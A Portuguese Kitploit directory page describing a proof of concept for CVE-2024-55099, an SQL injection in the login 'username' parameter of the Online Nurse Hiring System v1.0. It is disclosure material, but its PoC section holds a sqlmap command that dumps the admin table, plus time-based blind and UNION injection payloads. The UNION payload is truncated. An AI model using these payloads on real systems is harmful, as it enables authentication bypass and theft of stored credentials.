Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability- — Prova de conceito para CVE-2024-55099, demonstrando injeção SQL no Online Nurse Hiring System v1.0 através do parâmetro username não sanitizado, permitindo enumeração de banco de dados e bypass de autenticação. | Kitploit
Ferramentas/GitHubGitHub/ugurkarakoc1/cve-2024-55099-online-nurse-hiring-system-v1.0-sql-injection-vulnerability-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoArchived
GitHubugurkarakoc1/cve-2024-55099-online-nurse-hiring-system-v1.0-sql-injection-vulnerability-

CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability-

Prova de conceito para CVE-2024-55099, demonstrando injeção SQL no Online Nurse Hiring System v1.0 através do parâmetro username não sanitizado, permitindo enumeração de banco de dados e bypass de autenticação.

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-55099 - Vulnerabilidade de Injeção SQL no Online-Nurse-Hiring-System v1.0

  • Autor do Exploit: ugurkarakoc

Página do Fornecedor

  • https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql

Link do Software

  • https://phpgurukul.com/?sdm_process_download=1&download_id=17826

Visão Geral

  • O Online-Nurse-Hiring-System-v1.0 possui validação e sanitização insuficientes dos parâmetros 'username', o que pode criar uma vulnerabilidade a ataques de injeção SQL, permitindo acesso não autorizado ao banco de dados e comprometendo a segurança do sistema.

Detalhes da Vulnerabilidade

  • CVE ID: CVE-2024-55099
  • Versão Afetada: Online-Nurse-Hiring-System-v1.0
  • Arquivo Vulnerável: /admin/index.php.
  • Nomes dos Parâmetros: username
  • Tipo de Ataque: Local

Referências:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55099
  • https://nvd.nist.gov/vuln/detail/CVE-2024-55099

Descrição

  • A falta de validação e sanitização adequadas nos parâmetros 'username' permite que um atacante crie consultas de injeção SQL, contornando mecanismos de autenticação e obtendo acesso não autorizado ao banco de dados.

Prova de Conceito (PoC) :

  • sqlmap -r r.txt -dbs --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump
root@kitploit:~
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e
---

image

Baixar ferramenta